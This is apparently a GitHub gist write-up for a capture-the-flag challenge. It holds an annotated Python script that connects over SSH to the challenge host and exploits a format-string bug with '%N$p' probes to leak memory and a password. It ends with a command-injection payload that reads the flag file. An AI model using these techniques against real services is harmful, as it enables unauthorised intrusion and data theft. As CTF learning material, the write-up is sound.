@c3l3si4n
Last active August 9, 2020 00:54
Remote IoT Service @ SpiderLabsCTF 2020 writeup
"""
First part: Leaking password
"""
import paramiko
from time import sleep
import sys
from pwn import p64
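def test_password(password):
    """Submit one candidate *password* to the challenge shell and return its reply.

    Opens a fresh SSH session as the ``console`` user, starts an interactive
    shell, sends *password* plus a newline and collects the reply 8 bytes at a
    time until the collected output ends with ``b'valid password\\r\\n'``.

    Args:
        password: text to send as the password line.  It is sent verbatim, so
            it may carry ``%`` format directives (that is how ``leak_offset``
            uses this function).

    Returns:
        bytes: everything received up to and including the line ending in
        ``valid password``, or ``b'.'`` when the channel returned empty data
        more than 50 times (closed/EOF channel).

    Raises:
        socket.timeout: when no data arrives within 5 s; callers retry.
        Anything ``paramiko`` raises on connect/auth failure is propagated.
    """
    ssh = paramiko.SSHClient()
    # Host-key verification is disabled for a throwaway CTF host.  Outside a
    # lab this makes the session trivially interceptable; pin the key instead.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect('spiderlabsctf.com', username='console', password='console', port=3232)
        chan = ssh.invoke_shell()
        chan.settimeout(5.0)
        chan.send(f'{password}\n'.encode())
        buff = b""
        empty_counter = 0
        while not buff.endswith(b'valid password\r\n'):
            resp = chan.recv(8)
            # recv() yields bytes; comparing it with the str '' (as the
            # original did) never matched, so a closed channel spun forever.
            if not resp:
                empty_counter += 1
                if empty_counter > 50:
                    return b'.'
            buff += resp
        return buff
    finally:
        # Release the connection on every exit path (timeout, auth error,
        # normal return) so the retry loop in the caller does not leak sockets.
        ssh.close()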
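def leak_offset(index, string=False, pointer=False):
    """Read one value from the service via its format-string bug.

    The service evidently hands the submitted password to a printf-style call
    as the format argument, so a ``%<index>$p`` directive makes the reply echo
    the *index*-th variadic argument.  (Server-side, the fix is a constant
    format string, e.g. ``printf("%s", pw)``, plus ``-Wformat-security``.)

    Args:
        index: position of the argument to read, substituted into ``%<index>$p``.
        string: if True send ``%<index>$s`` (dereference as a C string) instead
            of the ``AB%<index>$p`` pointer probe.
        pointer: accepted for call compatibility; unused by this implementation.

    Returns:
        bytes: the leaked value.  A ``0x…`` reply is returned as its 8-byte
        little-endian packing (``p64``); anything else is returned raw, minus
        its first two bytes.

    Notes:
        Retries forever on any error from ``test_password`` (timeouts, dropped
        connections, unparsable replies), reporting each retry on stderr.
        The ``[2:]`` slice strips the ``AB`` marker of the pointer probe; in
        ``string`` mode there is no marker, so it presumably drops two real
        bytes of the leaked string -- verify before relying on string mode.
    """
    if string:
        payload = "%" + str(index) + "$s"
    else:
        # "AB" marks where the echoed value begins on the reply line.
        payload = "AB" + "%" + str(index) + "$p"
    while True:
        try:
            reply = test_password(payload)
            break
        except Exception as exc:  # best effort: the service is flaky, keep trying
            print(f"offset {index}: retrying after {exc!r}", file=sys.stderr)
    # The reply ends with CRLF, so split()[-1] is empty and [-2] is the line
    # that ends in "valid password"; the echoed payload is its first token.
    line = reply.split(b"\r\n")[-2]
    token = line.split(b" ")[0]
    leak = token[2:]
    if leak.startswith(b"0x"):
        leak = p64(int(leak, 16))
    return leak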
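# `base` is never read below; kept only because it is a module-level name.
base = ""
# Walk the format-string argument index upward and stream every leaked value
# to stdout.  The values are bytes, so write through the binary buffer:
# sys.stdout.write() raises TypeError on bytes under Python 3.
for offset in range(0, 1000000):
    leak = leak_offset(offset)
    sys.stdout.buffer.write(leak)
    sys.stdout.flush()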
"""
For the second part this payload can be used to get the flag.
ls&&cat<FLAG.txt
"""